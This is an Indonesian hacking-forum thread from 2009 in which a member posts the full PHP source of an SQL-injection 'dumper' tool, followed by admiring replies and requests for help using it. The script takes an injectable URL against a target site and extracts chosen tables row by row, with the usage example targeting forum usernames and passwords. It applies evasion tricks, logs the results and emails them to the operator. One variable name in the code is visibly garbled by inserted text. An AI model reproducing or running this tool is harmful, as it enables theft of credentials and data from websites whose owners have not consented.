X-code Professional

X-code Community

Facebook group

Instagram X-code

Twitter

X-code Blog

Panel
Welcome! Anonymous

gblack's SQLi Dumper v1.7

[ { NUM_COMMENT }]

Tempat pembahasan dan tutorial penggunaan tools untuk hacking, security dan forensik komputer.

Moderators: Paman, Xshadow, indounderground

Forum rules
Tool yang diupload oleh member tidak diperiksa oleh kami, mungkin saja terinfeksi oleh malware secara disengaja ataupun tidak, saran kami sebaiknya mendownload tool tersebut dari sumber pembuatnya. Bagi yang buat thread diharapkan menampilkan screenshot tool.

gblack's SQLi Dumper v1.7

Postby gblack » Wed Dec 16, 2009 1:08 am

Image


Code: Select all
<?php
/*********************************************************************
* I write this script because there was many SQLi Dumper script that *
* wont work when im trying to dump data from a SQLi bug of some site *
* which is has a good sec (i dont know what the sec) but in fact the *
* sec sh*t always ban my IP addr once i have dumped the data in line *
* 3000 or so. I thought that is an Anti-DDoS or something.. So why i *
* could dump with this script? Because i use file_get_contents and i *
* hope you understand what i mean by file_get_contents function in   *
* PHP instead of using LWP::UserAgent in Perl or somethin in Python. *
*                                                                    *
* Script name   : gblack's SQLi Dumper (sqlidumper.php)              *
* Info          : Inspired from SSDp by Vrs-hCk                      *
* Version       : 1.7                                                *
* Coded with    : Notepad++ v5.4.5 (UNICODE)                         *
* Coder         : gblack a.k.a biadabz                               *
* Contact       : the_rumput_segar[at]yahoo.co.id (IM Only)          *
* Thxz & greetz : Jack XShadow inc0mp13te b10 mywisdom Vrs-hCk       *
*                 blackincyber(for the bug report) Vires             *
*                 XCode MainHack ServerISdowN NetHeroes darkc0de     *
*                                                                    *
* /gblack-                                                           *
*********************************************************************/
   
/* CONFIGURATION START */

$email_reporting = 1; // Need mail() function enabled server; 1 = enable this feature; 0 = disable this feature
$report_to = "yourbox@gmail.com"; // Separate with comma (,) for multiple box; Example: "yourbox@gmail.com,someotherbox@gmail.com"
$verbose = 0; // 1 = Print output to the browser; 0 = Do not print output to the browser (Recommended for big data dumping, just close the browser ;))
/*  EOF CONFIGURATION  */
error_reporting(0);
set_time_limit(0);
ignore_user_abort(true);
if(isset($_GET['dump'])) {
    $file = $_GET['dump'];
    $allow = explode("--.", $file);
    $self = $_SERVER['SCRIPT_NAME'];
    if((!$file) || ($allow[1] <> "txt") || (!file_exists($file))){ // Only .txt file allowed & bug patch => downloading self when the 'dump' is empty: '/sqlidumper.php?dump='
        print "<script>alert('Not allowed!');</script>";
        print "<meta HTTP-Equiv='refresh' content='0; URL=$self'>";
        exit;
    }
    header("Content-type: text/plain");
    header("Content-Disposition: attachment; filename=".$file);
    readfile($file);
    unlink($file);
    exit;
}
?>
<html>
<head>
<style type="text/css">
body {
    background-color: #000;
    font-family: Courier New;
    font-size: 12px;
    color: #00FF00;
}
.textbox {
    margin:1px;
    border: #00FF00 1px solid;
    font-size: 12px;
    font-family: Courier New;
    color: #00FF00;
    background-color: #000;
}
#readme {
    border: 1px solid #00FF00;
    margin:3px;
    padding: 2px;
    width: 700;
    background-color: #111;
}
#main {
    border: 1px solid #00FF00;
    margin:3px;
    padding: 2px;
    width: 700;
    background-color: #111;
}
#readme {
    display:none;
}
#res {
    border: 1px solid #00FF00;
    margin:3px;
    padding: 2px;
    width: 700;
    background-color: #111;
}
#loading {
    border: 1px solid #00FF00;
    margin:3px;
    padding: 2px;
    width: 700;
}
a:link { color:#00FF00;}
a:hover  { color:#00FF00;}
</style>
<script type="text/javascript" language="JavaScript">
function HideContent(d) {
document.getElementById(d).style.display = "none";
}
function ShowContent(d) {
document.getElementById(d).style.display = "block";
}
function ReverseDisplay(d) {
if(document.getElementById(d).style.display == "none") { document.getElementById(d).style.display = "block"; }
else { document.getElementById(d).style.display = "none"; }
}
</script>
</head>
<title> gblack's SQLi Dumper</title>
<body onload="HideContent('readme');HideContent('loading');">
<center>
[ <a href="javascript:ReverseDisplay('readme');"><b> gblack's SQLi Dumper<b></a> ]
<div id="readme" align="left">
Readme:<br>
- SQLi URL: You must include 'gblack' string in 1 of the visible column(s) (magic number)<br>
- End tag: You may use '--' or '/*' for this, depend on the error type<br>
- Database: You may not fill this field if you want to dump the data from default database<br>
- Table: This is the table where the coulmn(s) of the data will be dumped from<br>
- Column(s): This is the column(s) where the data will be dumped from<br>
<br>Usage example:<br>
- SQLi URL: http://www.target.com/index.php?id=1+union+all+select+1,gblack,3,4<br>
- End tag: --<br>
- Database: phpbb_forum<br>
- Table: phpbb_users<br>
- Column(s): username,password<br>
<br>Thxz & greetz goes to:<br>Jack XShadow inc0mp13te b10 mywisdom Vrs-hCk blackincyber Vires<br>
</div>
<div id="main" align="left">
<form action="" method="post"><br>
SQLi URL:&#160;
<input name="url" class="textbox" type="text" value="" size="88"/><br>
End tag:&#160;&#160;&#160;<input name="evasion" class="textbox" type="text" value="" size="5"/>
&#160;&#160;&#160;&#160;Database:<input name="database" class="textbox" type="text" value="" size="20"/>
&#160;&#160;&#160;&#160;Table:<input name="table" class="textbox" type="text" value="" size="20"/><br>
Column(s): <input name="column" class="textbox" type="text" value="" size="88"/><br>
<input name="query" class="textbox" value="Dump now!" type="submit" onClick="javascript:ShowContent('loading');HideContent('readme');">
</form>
</div>
<div id='loading' style="display:none;"><img src='http://www.techbd.com/images/loading.gif'></div>
<div id='res' align='left'>
<?php
if (isset($_POST['query'])) {
    $tempik = trim($_POST['evasion']);
    $sqli = trim($_POST['url']);
    $db = trim($_POST['database']);
    $table_name = trim($_POST['table']);
    $column_name = trim($_POST['column']);
    if (preg_match("/\+UNION\+/i", $sqli)){
        $spasi = "+";
    } else {
        $spasi = "/**/";
    }
    if(!$sqli || !$tempik || !$table_name || !$column_name) {
        print "<font color='red'>[!] Error: Please complete all required fields!</font>";
        exit;
    }
    $tgl_lahir = date("d-m-Y");
    if(preg_match("/https/i", $sqli)) {
        $sitename = str_replace("https://", "", $sqli);
    } else {   
        $sitename = str_replace("http://", "", $sqli);
    }
    $waktustart = date("h:i:s");
    $namafl = explode("/", $sitename);
    $logz = $namafl[0]."_".$db."_".$table_name."_".str_replace(",", "-", $column_name)."_".$tgl_lahir."--.txt";
    $by = "0x67626C61636B";
    $mbut = "UNHEX(HEX(CONCAT(".$by.",COUNT(*),".$by.")))";
    $matamu = str_replace("gblack", $mbut, $sqli);
    $picek = $matamu.$spasi."FROM".$spasi.$db.".".$table_name.$tempik;
    if(!$db <> "") {
        $picek = $matamu.$spasi."FROM".$spasi.$table_name.$tempik;
    }
    print "[+] Attempting to connect to $namafl[0] on port 80 ... <br>";
    flush();ob_flush();
    $konak = fsockopen($namafl[0], 80);
    if (!$konak) {
        print "<font color='red'>[!] Error: Failed to connect to $namafl[0]<br></font>";
        exit;
    } else {
        print "[+] Connected to $namafl[0]<br><br>";
    }
    $hooh = @file_get_contents($picek);
    if (preg_match("/gblack(.*?)gblack/i", $hooh, $iyo)) {
        $logging = fopen($logz, "a+");
        fwrite($logging, "==============================================================================================\r\n");
        fwrite($logging, "|                                       SQLi Dumper v1.7                                     |\r\n");
        fwrite($logging, "|                                   Coded © 2009 By gblack                                   |\r\n");
        fwrite($logging, "|                         the_rumput_segar[at]yahoo.co.id (IM Only)                          |\r\n");
        fwrite($logging, "|                                                                                            |\r\n");
        fwrite($logging, "| amit-amit Security!                                                                             |\r\n");
        fwrite($logging, "==============================================================================================\r\n\r\n");
        fwrite($logging, "[+] SQLi URL: ".$sqli."\r\n");
        fwrite($logging, "[+] Evasion used: \"".$spasi."\" and \"".$tempik."\"\r\n");       
        fwrite($logging, "[+] Database: ".$db."\r\n");   
        fwrite($logging, "[+] Table name: ".$table_name."\r\n");
        fwrite($logging, "[+] Column(s) name: ".$column_name."\r\n");
        print "[+] SQLi URL: ".$sqli."<br>";
        print "[+] Evasion used: \"".$spasi."\" and \"".$tempik."\"<br>";
        print "[+] Database: ".$db."<br>";   
        print "[+] Table name: ".$table_name."<br>";
        print "[+] Column(s) name: ".$column_name."<br>";
        flush();ob_flush();
        $limit = $iyo[1];
        fwrite($logging, "[+] There are ".$limit." entries to be extracted.\r\n\r\n");
        print "[+] There are ".$limit." entries to be extracted.<br><br>";
    } else {
        print "<font color='red'>[!] Error: Could not get limit!</font>";
        print "<script>HideContent('loading');</script>";
        exit;
    }
    $Forum Yogyafree Keren Yach = "UNHEX(HEX(CONCAT(".$by.",CONCAT_WS(0x3a,$column_name),".$by.")))";
    $xonthol = str_replace("gblack", $Forum Yogyafree Keren Yach, $sqli);   
   
    print "[+] Dumping data started at ".$waktustart." ".$tgl_lahir." ...<br><br>";
    fwrite($logging, "[+] Dumping data started at ".$waktustart." ...\r\n\r\n");
    for($id=0;$id<=$limit;$id++) {
        $anak_ke = $id+1;
        flush();ob_flush();
        $kenthu = $xonthol.$spasi."FROM".$spasi.$db.".".$table_name.$spasi."LIMIT".$spasi.$id.",1".$tempik;
        if(!$db <> "") {
            $kenthu = $xonthol.$spasi."FROM".$spasi.$table_name.$spasi."LIMIT".$spasi.$id.",1".$tempik;
        }
        $hamil = @file_get_contents($kenthu);
        if (preg_match("/gblack(.*?)gblack/i", $hamil, $kembar)){
            fwrite($logging, "[".$anak_ke."] ".$kembar[1]."\r\n");
            if($verbose) {
                print "[".$anak_ke."] ".$kembar[1]."<br>";
                print "<script>ShowContent('loading');</script>";
            } elseif(!$verbose) {
                print "<script>ShowContent('loading');</script>";
            }
        }
    }
   
    $waktufinish = date("h:i:s");
    $tgl_mati = date("d-m-Y");
    print "<br>[+] Dumping data finished at ".$waktufinish." ".$tgl_mati;
    fwrite($logging, "\r\n[+] Dumping data finished at ".$waktufinish." ".$tgl_mati."\r\n\r\n");
    fclose($logging);
    print "<br>[+] <a href='?dump=$logz'>Click here to download the log file!</a>";
    print "<script>HideContent('loading');</script>";
    if($email_reporting) {
        $to      = $report_to;
        $subject = 'Dump - '.$logz;
        $message = 'http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']."?dump=".$logz;
        $headers = 'From: Dumper Log<dumper@fbi.gov>' . "\r\n" . 'X-Mailer: PHP/' . phpversion();
        if(mail($to, $subject, $message, $headers) == false) {
            print "<font color='red'><br>[!] Error: Could not send email report!";
        } else {
            print "<br>[+] Email report sent!";
           
        }
    }
}
?>

</div>
</center>
</body>
</html>

Code: Select all
http://ngaceng-a.biz/sqlidumper.txt


Monggo disedot... Dicoba2... Dijilat...

**wogh!** :omg:

Ditunggu comment na gan!! :malumalu:
Brb dl... Ngisi ilmu... :tapa:
Last edited by gblack on Thu Dec 17, 2009 4:08 am, edited 1 time in total.

Down doesn't mean die.

I will never die,
gbLaCk-

User avatar
gblack
 
Posts: 61
Joined: Tue Jan 30, 2007 8:12 pm
Location: /r00tb0x

Re: gblack's SQLi Dumper v1.0

Postby Bi4kKob4r » Wed Dec 16, 2009 1:11 am

manztab boz...

btw ntar pake b10 ya :malumalu: :malumalu: :malumalu:

kabur ah :tapa: :tapa: :tapa:
I think just : Make better than the best

Life is Love,
Love is Feeling,
Feeling is your heart,
Heart Controlling By your brain.

Always INject your brain with the greatest knowledges.
User avatar
Bi4kKob4r
 
Posts: 254
Joined: Sat Jul 21, 2007 11:45 am
Location: Bi4kKob4r~root : ls..

Re: gblack's SQLi Dumper v1.0

Postby lucky_boyz » Wed Dec 16, 2009 1:13 am

kerens sich bang...tapi sayang na aku nggak tw cara dapatkan seperti itu...dari mana proses na aku nggak tw :circle:
Regards,
LordIRc
User avatar
lucky_boyz
 
Posts: 85
Joined: Tue Nov 25, 2008 3:36 am

Re: gblack's SQLi Dumper v1.0

Postby tey » Wed Dec 16, 2009 1:14 am

huhuhu,, siippp,,, :love:
i am not detractor person..like u :)
be a good boy..
User avatar
tey
 
Posts: 68
Joined: Tue May 01, 2007 11:30 am
Location: heaven

Re: gblack's SQLi Dumper v1.0

Postby al-carati » Wed Dec 16, 2009 8:47 am

mantab Gan....ditunggu POC berikutnya yee....seger teyusssssss
kaya ID ym-ne The rumput segar :ngakak:
“Tidaklah dua orang muslim saling bertemu kemudian berjabat tangan, kecuali akan diampuni (dosa-dosa) mereka berdua sebelum mereka berpisah.“HR Abu Dawud (no. 5212)
http://www.kajian.net/
Image
al-carati
 
Posts: 128
Joined: Sat Dec 12, 2009 11:03 pm
Location: Madinah an-Nabawiyah

Re: gblack's SQLi Dumper v1.7

Postby YaDoY666 » Sun Dec 20, 2009 10:16 pm

Keren.... ^_^
ANTI NATO ( NO ACTION TALK ONLY )


http://yadoy666.serverisdown.org
YaDoY666
 
Posts: 49
Joined: Fri Mar 30, 2007 10:22 am
Location: C:\Windows\System32

Re: gblack's SQLi Dumper v1.7

Postby gblack » Sun Dec 20, 2009 10:18 pm

Aw... Bang YaDoY bsa aza...
Huehuehuehue.. :ngakak:

Down doesn't mean die.

I will never die,
gbLaCk-

User avatar
gblack
 
Posts: 61
Joined: Tue Jan 30, 2007 8:12 pm
Location: /r00tb0x

Re: gblack's SQLi Dumper v1.7

Postby blackincyber » Sun Dec 20, 2009 10:29 pm

Wew Dah Fix to. Santap
Move from one city to other city, get more knowledge. if you have more knowledge please share with your friends. Creating Indonesia with best IT.
User avatar
blackincyber
 
Posts: 1
Joined: Tue Feb 03, 2009 9:43 pm
Location: From place to other place

Re: gblack's SQLi Dumper v1.7

Postby monsieur_zizou » Sun Dec 20, 2009 10:57 pm

ajarin dong oms :kaca: :kaca: :malumalu: :malumalu: :love: :love: :love:
Image
Kosova Technology adalah Konsultan IT di bidang jasa pembuatan website, pembuatan program, maintenance komputer, web design, SEO =====>Kosova Technology
User avatar
monsieur_zizou
 
Posts: 15
Joined: Mon Feb 25, 2008 6:24 pm
Location: UNIX

Re: gblack's SQLi Dumper v1.7

Postby uyud123 » Mon Jan 25, 2010 9:54 am

duh kok ga bisa-bisa nyabanya... mohon bantuannya
uyud123
 
Posts: 2
Joined: Sun Jan 17, 2010 11:35 pm

{ FACEBOOK_COMMENT }

Next

Return to Tools For Hacking - Security & Computer Forensic

Who is online

Users browsing this forum: No registered users and 11 guests